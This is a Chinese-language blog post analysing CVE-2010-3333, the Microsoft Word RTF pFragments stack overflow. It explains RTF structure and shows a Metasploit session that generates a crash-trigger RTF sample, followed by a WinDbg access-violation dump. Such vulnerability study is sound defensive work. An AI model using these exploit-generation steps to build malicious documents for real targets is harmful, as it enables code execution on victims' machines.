CVE-2010-3333 Microsoft RTF栈溢出漏洞分析

本文主要是介绍CVE-2010-3333 Microsoft RTF栈溢出漏洞分析，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

参考：《漏洞战争》

漏洞描述

Microsoft Office XP SP3，Office 2003 SP3，Office 2007 SP2，Office 2010等多个版本的Office软件中的Open XML文件格式转换器存在栈溢出漏洞，主要是在处理RTF中的“pFragments”属性时存在栈溢出，导致远程攻击者可以借助特制的RTF数据执行任意代码，因此该漏洞又名“RTF栈缓冲区溢出漏洞”。

分析环境

	所用环境
操作系统	windows xp sp3
调试器	windbg
漏洞软件	office word 2003 sp3

RTF文件格式

RTF（Rich Text Format）格式是Microsoft公司为进行文本和图像信息格式的交换而制定的文件格式，它适用于不同的设备、操作环境和操作系统。RTF文件的基本元素是正文（TEXT）、控制字（Control Word）、控制符号（Control Symbol）和群组（Group）

（1）控制字是RTF用来标记打印控制符和管理文档信息的一种特殊格式的命令，RTF用它作为正文格式的控制代码，每个控制字均以一个反斜杠\开头，由a~z小写字母组成，通常应该不包含任何大写字母，而分隔符标志着控制字名称的结束。它的使用格式为：\字母序列<分隔符>

（2）控制符号由反斜杠后跟一个单独的、非字母的字符，表示一个特定的符号

（3）群组由包含在大括号中的文本、控制字或控制符组成。左括符’{‘表示组的开始，右括符’}'表示组的结束。每个组包括文本和文本的不同属性。RTF文件也能同时包括字体、格式、屏幕颜色、图形、脚注、注释（注解）、文件头和文件尾、摘要信息、域和书签的组合，以及文档、区段、段落和字符的格式属性

一个完整的RTF文件包括文件头<header>和文档区<document>两大部分，可以用下列的语法表示

<File> '{' <header> <document> '}'

通过微软官方文档的目录，我们大体可以了解到文件头和文档区各自所包含的数据，如下所示：

Content of an RTF fileHeaderRTF VersionCharacter SetUnicode RTFFont TableColor TableStyle SheetList TableTrack Changes(Revision Marks)Document AreaInformation GroupDocument Formatting PropertiesSection TextParagraph TextCharacter TextDocument VariablesBookmarksPicturesObjectsDrawing ObjectsWord 97-2000 RTF for Drawing Object(Shapes)FootnotesComments(Annotations)FieldsForm FieldsIndex EntriesBidrectional language Support

我们回头看下CVE-2010-3333的部分数据，如图所示
在这里插入图片描述
样本数据分析如下：

\rtf1——RTF版本
\ansi——支持ANSI字符集
\shp——绘图对象
\*\shpinst———图片引用
\sp——绘图对象属性定义
\sn pFragments——定义属性名称，pFragments段是图形的附加部分 属于数组结构。它允许图形包含多个路径和分段，该属性值列出图形的各个碎片
\sv——定义属性值

RTF分析器正是在解析pFragments属性值时，没有正确计算属性值所占的空间大小，导致栈溢出漏洞的发生

基于栈回溯的漏洞分析方法

用Metasploit生成样本

msf5 > search cve-2010-3333Matching Modules
================#  Name                                                    Disclosure Date  Rank   Check  Description-  ----                                                    ---------------  ----   -----  -----------0  exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  No     MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)msf5 > use 0
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > infoName: MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)Module: exploit/windows/fileformat/ms10_087_rtf_pfragments_bofPlatform: WindowsArch: Privileged: NoLicense: Metasploit Framework License (BSD)Rank: GreatDisclosed: 2010-11-09Provided by:wushi of team509unknownjduck <jduck@metasploit.com>DJ Manila Ice, Vesh, CAAvailable targets:Id  Name--  ----0   Automatic1   Microsoft Office 2002 SP3 English on Windows XP SP3 English2   Microsoft Office 2003 SP3 English on Windows XP SP3 English3   Microsoft Office 2007 SP0 English on Windows XP SP3 English4   Microsoft Office 2007 SP0 English on Windows Vista SP0 English5   Microsoft Office 2007 SP0 English on Windows 7 SP0 English6   Crash Target for DebuggingCheck supported:NoBasic options:Name      Current Setting  Required  Description----      ---------------  --------  -----------FILENAME  msf.rtf          yes       The file name.Payload information:Space: 512Avoid: 1 charactersDescription:This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that Microsoft will confirm or deny this since Office 2000 has reached its support cycle end-of-life.References:https://cvedetails.com/cve/CVE-2010-3333/OSVDB (69085)https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/MS10-087http://www.securityfocus.com/bid/44652http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set target 6
target => 6
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit[*] Creating 'msf.rtf' file ...
[+] msf.rtf stored at /home/kali/.msf4/local/msf.rtf
msf5 exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) >

获取样本后，打开WINWORD.exe，并用WinDbg附加进程，然后选择打开msf.rtf，触发异常

(cfc.c08): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000c8ac ebx=05000000 ecx=0000019b edx=00000000 esi=1104c24c edi=00130000
eip=30ed442c esp=00123d98 ebp=00123dd0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office11\mso.dll